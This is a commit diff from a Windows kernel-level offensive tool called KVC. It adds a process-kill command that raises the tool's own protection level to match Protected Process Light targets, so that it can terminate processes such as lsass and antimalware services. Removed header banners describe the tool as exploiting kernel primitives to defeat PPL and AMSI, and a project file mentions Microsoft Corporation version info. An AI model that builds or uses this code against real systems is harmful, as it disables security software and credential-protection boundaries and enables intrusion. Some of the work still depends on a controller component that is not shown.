#include "Utils.h"

275
kvc/ProcessManager.cpp Normal file
View File

@@ -0,0 +1,275 @@
// ProcessManager.cpp
#include "ProcessManager.h"
#include "Controller.h"
#include "Utils.h"
#include <cwctype>
#include <sstream>
#include <iostream>
#include <iomanip>
#include <TlHelp32.h>
#include <algorithm>
#include <cctype>
extern volatile bool g_interrupted;
// Helper function to check if string contains only digits (PID)
bool ProcessManager::IsNumericPid(std::wstring_view input) noexcept {
if (input.empty()) return false;
return std::all_of(input.begin(), input.end(), [](wchar_t c) { return iswdigit(c); });
}
// Find process PIDs by name using Windows toolhelp API
std::vector<DWORD> ProcessManager::FindProcessIdsByName(const std::wstring& processName) noexcept {
std::vector<DWORD> pids;
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hSnapshot == INVALID_HANDLE_VALUE) {
return pids;
}
PROCESSENTRY32W pe;
pe.dwSize = sizeof(PROCESSENTRY32W);
if (Process32FirstW(hSnapshot, &pe)) {
do {
std::wstring currentName = pe.szExeFile;
// Remove .exe extension for comparison if present
if (currentName.size() > 4 && currentName.substr(currentName.size() - 4) == L".exe") {
currentName = currentName.substr(0, currentName.size() - 4);
}
// Case-insensitive partial match
std::wstring lowerCurrent = currentName;
std::wstring lowerTarget = processName;
std::transform(lowerCurrent.begin(), lowerCurrent.end(), lowerCurrent.begin(), ::towlower);
std::transform(lowerTarget.begin(), lowerTarget.end(), lowerTarget.begin(), ::towlower);
if (lowerCurrent.find(lowerTarget) != std::wstring::npos) {
pids.push_back(pe.th32ProcessID);
}
} while (Process32NextW(hSnapshot, &pe));
}
CloseHandle(hSnapshot);
return pids;
}
// Terminate process with automatic protection elevation
bool ProcessManager::TerminateProcessWithProtection(DWORD processId, Controller* controller) noexcept {
if (!controller) {
ERROR(L"Controller not available for protection elevation");
return false;
}
if (g_interrupted) {
INFO(L"Operation cancelled by user before termination");
return false;
}
std::wstring processName = Utils::GetProcessName(processId);
INFO(L"Attempting to terminate process: %s (PID %d)", processName.c_str(), processId);
// Get target process protection level for self-elevation
auto kernelAddr = controller->GetProcessKernelAddress(processId);
bool needsSelfProtection = false;
std::wstring levelStr, signerStr;
if (kernelAddr) {
auto targetProtection = controller->GetProcessProtection(kernelAddr.value());
if (targetProtection && targetProtection.value() > 0) {
needsSelfProtection = true;
UCHAR targetLevel = Utils::GetProtectionLevel(targetProtection.value());
UCHAR targetSigner = Utils::GetSignerType(targetProtection.value());
levelStr = (targetLevel == static_cast<UCHAR>(PS_PROTECTED_TYPE::Protected)) ? L"PP" : L"PPL";
switch (static_cast<PS_PROTECTED_SIGNER>(targetSigner)) {
case PS_PROTECTED_SIGNER::Lsa: signerStr = L"Lsa"; break;
case PS_PROTECTED_SIGNER::WinTcb: signerStr = L"WinTcb"; break;
case PS_PROTECTED_SIGNER::WinSystem: signerStr = L"WinSystem"; break;
case PS_PROTECTED_SIGNER::Windows: signerStr = L"Windows"; break;
case PS_PROTECTED_SIGNER::Antimalware: signerStr = L"Antimalware"; break;
case PS_PROTECTED_SIGNER::Authenticode: signerStr = L"Authenticode"; break;
case PS_PROTECTED_SIGNER::CodeGen: signerStr = L"CodeGen"; break;
case PS_PROTECTED_SIGNER::App: signerStr = L"App"; break;
default:
INFO(L"Unknown signer type - attempting termination without self-protection");
needsSelfProtection = false;
break;
}
if (needsSelfProtection) {
INFO(L"Target process protection: %s-%s", levelStr.c_str(), signerStr.c_str());
if (!controller->SelfProtect(levelStr, signerStr)) {
INFO(L"Self-protection elevation failed: %s-%s (attempting termination anyway)",
levelStr.c_str(), signerStr.c_str());
needsSelfProtection = false;
} else {
SUCCESS(L"Self-protection elevated to %s-%s", levelStr.c_str(), signerStr.c_str());
}
}
} else {
INFO(L"Target process is not protected, proceeding with standard termination");
}
} else {
INFO(L"Could not get kernel address for target process, proceeding without self-protection");
}
if (g_interrupted) {
INFO(L"Operation cancelled by user during protection setup");
if (needsSelfProtection) {
controller->SelfProtect(L"none", L"none");
}
return false;
}
// Attempt process termination
HANDLE processHandle = OpenProcess(PROCESS_TERMINATE, FALSE, processId);
bool success = false;
if (processHandle) {
BOOL result = TerminateProcess(processHandle, 0);
CloseHandle(processHandle);
success = (result != FALSE);
} else {
DWORD error = GetLastError();
ERROR(L"Failed to open process for termination (error: %d)", error);
}
// Cleanup self-protection
if (needsSelfProtection) {
if (!controller->SelfProtect(L"none", L"none")) {
ERROR(L"Failed to cleanup self-protection after termination");
} else {
INFO(L"Self-protection cleaned up successfully");
}
}
return success;
}
// Main command handler for process termination operations with protection elevation
void ProcessManager::HandleKillCommand(int argc, wchar_t* argv[], Controller* controller) noexcept {
if (argc < 3) {
PrintKillUsage();
return;
}
if (!controller) {
ERROR(L"Controller not available - cannot perform protected process termination");
return;
}
INFO(L"Starting process termination with automatic protection elevation...");
std::vector<DWORD> processIds;
if (!ParseProcessIds(argv[2], processIds)) {
ERROR(L"Failed to parse process ID/name list");
return;
}
if (processIds.empty()) {
ERROR(L"No valid process IDs or names provided");
return;
}
if (g_interrupted) {
INFO(L"Operation cancelled by user before processing");
return;
}
// Execute termination for each target process with protection elevation
int successCount = 0;
for (DWORD pid : processIds) {
if (g_interrupted) {
INFO(L"Operation cancelled by user during batch termination");
break;
}
if (controller->KillProcess(pid)) {
SUCCESS(L"Terminated PID: %u", pid);
successCount++;
} else {
ERROR(L"Failed to terminate PID: %u", pid);
}
}
INFO(L"Kill operation completed: %d/%zu processes terminated",
successCount, processIds.size());
}
// Parse comma-separated process ID/name list with input validation
bool ProcessManager::ParseProcessIds(std::wstring_view pidList, std::vector<DWORD>& pids) noexcept {
std::wstring pidStr(pidList);
size_t pos = 0;
size_t start = 0;
while (pos != std::wstring::npos) {
pos = pidStr.find(L',', start);
std::wstring token;
if (pos != std::wstring::npos) {
token = pidStr.substr(start, pos - start);
start = pos + 1;
} else {
token = pidStr.substr(start);
}
// Trim leading and trailing whitespace
size_t first = token.find_first_not_of(L" \t");
if (first == std::wstring::npos) continue;
size_t last = token.find_last_not_of(L" \t");
token = token.substr(first, (last - first + 1));
if (token.empty()) continue;
// Check if token is numeric (PID) or text (process name)
if (IsNumericPid(token)) {
try {
DWORD pid = std::wcstoul(token.c_str(), nullptr, 10);
if (pid == 0) {
ERROR(L"Invalid PID: %s (PID cannot be 0)", token.c_str());
continue;
}
pids.push_back(pid);
}
catch (...) {
ERROR(L"Invalid PID format: %s", token.c_str());
continue;
}
}
else {
// Process name - find matching PIDs using Toolhelp32 (will be handled by Controller later)
auto foundPids = FindProcessIdsByName(token);
if (foundPids.empty()) {
ERROR(L"No process found matching: %s", token.c_str());
continue;
}
INFO(L"Found %zu processes matching '%s'", foundPids.size(), token.c_str());
for (DWORD pid : foundPids) {
pids.push_back(pid);
}
}
}
return !pids.empty();
}
// Display command usage and examples
void ProcessManager::PrintKillUsage() noexcept {
std::wcout << L"Usage: kvc kill <pid1|name1>[,pid2|name2,pid3|name3,...]\n";
std::wcout << L" Examples:\n";
std::wcout << L" kvc kill 1234\n";
std::wcout << L" kvc kill notepad\n";
std::wcout << L" kvc kill total\n";
std::wcout << L" kvc kill lsass # Protected process (auto-elevation)\n";
std::wcout << L" kvc kill 1234,notepad,calc\n";
std::wcout << L" kvc kill \"1234, notepad, 5678\"\n";
std::wcout << L" Note: Automatically elevates protection level to match protected targets\n\n";
}

28
kvc/ProcessManager.h Normal file
View File

@@ -0,0 +1,28 @@
// ProcessManager.h
#pragma once
#include "common.h"
#include <vector>
#include <string>
// Forward declaration to avoid circular includes
class Controller;
// Process management operations with self-protection capabilities
class ProcessManager
{
public:
ProcessManager() = delete;
~ProcessManager() = delete;
// Command line interface for process termination with Controller integration
static void HandleKillCommand(int argc, wchar_t* argv[], Controller* controller) noexcept;
private:
// Command parsing and validation helpers
static bool ParseProcessIds(std::wstring_view pidList, std::vector<DWORD>& pids) noexcept;
static void PrintKillUsage() noexcept;
static bool TerminateProcessWithProtection(DWORD processId, Controller* controller) noexcept;
static bool IsNumericPid(std::wstring_view input) noexcept;
static std::vector<DWORD> FindProcessIdsByName(const std::wstring& processName) noexcept;
};

25
kvc/ReportExporter.cpp
View File

@@ -1,28 +1,3 @@
/*******************************************************************************
_ ____ ______
| |/ /\ \ / / ___|
| ' / \ \ / / |
| . \ \ V /| |___
|_|\_\ \_/ \____|
The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research,
offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived
as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation
of kernel-level primitives** for legitimate security research and penetration testing.
KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows
security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware
Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures
that define these protections.
-----------------------------------------------------------------------------
Author : Marek Wesołowski
Email : marek@wesolowski.eu.org
Phone : +48 607 440 283 (Tel/WhatsApp)
Date : 04-09-2025
*******************************************************************************/
#include "ReportExporter.h"
#include "Controller.h"
#include <filesystem>

27
kvc/SelfLoader.cpp
View File

@@ -1,29 +1,4 @@
/*******************************************************************************
_ ____ ______
| |/ /\ \ / / ___|
| ' / \ \ / / |
| . \ \ V /| |___
|_|\_\ \_/ \____|
The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research,
offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived
as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation
of kernel-level primitives** for legitimate security research and penetration testing.
KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows
security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware
Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures
that define these protections.
-----------------------------------------------------------------------------
Author : Marek Wesołowski
Email : marek@wesolowski.eu.org
Phone : +48 607 440 283 (Tel/WhatsApp)
Date : 04-09-2025
*******************************************************************************/
// SelfLoader.cpp
// SelfLoader.cpp
#include <windows.h>
#include <algorithm>
#include <cstring>

25
kvc/ServiceManager.cpp
View File

@@ -1,28 +1,3 @@
/*******************************************************************************
_ ____ ______
| |/ /\ \ / / ___|
| ' / \ \ / / |
| . \ \ V /| |___
|_|\_\ \_/ \____|
The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research,
offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived
as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation
of kernel-level primitives** for legitimate security research and penetration testing.
KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows
security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware
Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures
that define these protections.
-----------------------------------------------------------------------------
Author : Marek Wesołowski
Email : marek@wesolowski.eu.org
Phone : +48 607 440 283 (Tel/WhatsApp)
Date : 04-09-2025
*******************************************************************************/
#include "ServiceManager.h"
#include "Controller.h"
#include "KeyboardHook.h"

25
kvc/TrustedInstallerIntegrator.cpp
View File

@@ -1,28 +1,3 @@
/*******************************************************************************
_ ____ ______
| |/ /\ \ / / ___|
| ' / \ \ / / |
| . \ \ V /| |___
|_|\_\ \_/ \____|
The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research,
offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived
as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation
of kernel-level primitives** for legitimate security research and penetration testing.
KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows
security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware
Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures
that define these protections.
-----------------------------------------------------------------------------
Author : Marek Wesołowski
Email : marek@wesolowski.eu.org
Phone : +48 607 440 283 (Tel/WhatsApp)
Date : 04-09-2025
*******************************************************************************/
#include "TrustedInstallerIntegrator.h"
#include "common.h"
#include <tchar.h>

25
kvc/Utils.cpp
View File

@@ -1,28 +1,3 @@
/*******************************************************************************
_ ____ ______
| |/ /\ \ / / ___|
| ' / \ \ / / |
| . \ \ V /| |___
|_|\_\ \_/ \____|
The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research,
offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived
as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation
of kernel-level primitives** for legitimate security research and penetration testing.
KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows
security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware
Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures
that define these protections.
-----------------------------------------------------------------------------
Author : Marek Wesołowski
Email : marek@wesolowski.eu.org
Phone : +48 607 440 283 (Tel/WhatsApp)
Date : 04-09-2025
*******************************************************************************/
// Utils.cpp - Fixed compilation issues with NtQuerySystemInformation
#include "Utils.h"
#include "common.h"

6
kvc/Utils.h
View File

@@ -54,7 +54,7 @@ namespace Utils
return sectionSignatureLevel & 0x0F;
}
// String conversion functions with static caching
// String conversion functions with static caching for performance
const wchar_t* GetProtectionLevelAsString(UCHAR protectionLevel) noexcept;
const wchar_t* GetSignerTypeAsString(UCHAR signerType) noexcept;
const wchar_t* GetSignatureLevelAsString(UCHAR signatureLevel) noexcept;
@@ -75,8 +75,8 @@ namespace Utils
};
ProcessDumpability CanDumpProcess(DWORD pid, const std::wstring& processName) noexcept;
// Hex string processing utilities for kernel tools
// Hex string processing utilities for kernel tools
bool HexStringToBytes(const std::wstring& hexString, std::vector<BYTE>& bytes) noexcept;
bool IsValidHexString(const std::wstring& hexString) noexcept;

25
kvc/common.cpp
View File

@@ -1,28 +1,3 @@
/*******************************************************************************
_ ____ ______
| |/ /\ \ / / ___|
| ' / \ \ / / |
| . \ \ V /| |___
|_|\_\ \_/ \____|
The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research,
offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived
as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation
of kernel-level primitives** for legitimate security research and penetration testing.
KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows
security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware
Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures
that define these protections.
-----------------------------------------------------------------------------
Author : Marek Wesołowski
Email : marek@wesolowski.eu.org
Phone : +48 607 440 283 (Tel/WhatsApp)
Date : 04-09-2025
*******************************************************************************/
// common.cpp - Core system utilities and dynamic API management
// Implements service management, system path resolution, and Windows API abstraction

25
kvc/kvc_crypt.cpp
View File

@@ -1,28 +1,3 @@
/*******************************************************************************
_ ____ ______
| |/ /\ \ / / ___|
| ' / \ \ / / |
| . \ \ V /| |___
|_|\_\ \_/ \____|
The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research,
offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived
as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation
of kernel-level primitives** for legitimate security research and penetration testing.
KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows
security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware
Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures
that define these protections.
-----------------------------------------------------------------------------
Author : Marek Wesołowski
Email : marek@wesolowski.eu.org
Phone : +48 607 440 283 (Tel/WhatsApp)
Date : 04-09-2025
*******************************************************************************/
// kvc_crypt.cpp
#include <Windows.h>
#include <ShlObj.h>

2
kvc/kvc_crypt.vcxproj
View File

@@ -82,7 +82,7 @@
<!-- Fixed: Added resource file for Microsoft Corporation version info -->
<ResourceCompile Include="kvc_crypt.rc" />
</ItemGroup>
<!-- DODAJ TARGET DO CZYSZCZENIA ZASOBÓW -->
<!-- ADD TARGET FOR RESOURCE CLEANING -->
<Target Name="RemoveVCRuntimeResources" AfterTargets="Link">
<Exec Command="if exist &quot;@(FinalOutputPath)&quot; echo Building minimal DLL..." />
</Target>

25
kvc/syscalls.cpp
View File

@@ -1,28 +1,3 @@
/*******************************************************************************
_ ____ ______
| |/ /\ \ / / ___|
| ' / \ \ / / |
| . \ \ V /| |___
|_|\_\ \_/ \____|
The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research,
offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived
as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation
of kernel-level primitives** for legitimate security research and penetration testing.
KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows
security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware
Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures
that define these protections.
-----------------------------------------------------------------------------
Author : Marek Wesołowski
Email : marek@wesolowski.eu.org
Phone : +48 607 440 283 (Tel/WhatsApp)
Date : 04-09-2025
*******************************************************************************/
// syscalls.cpp
#include "syscalls.h"
#include <vector>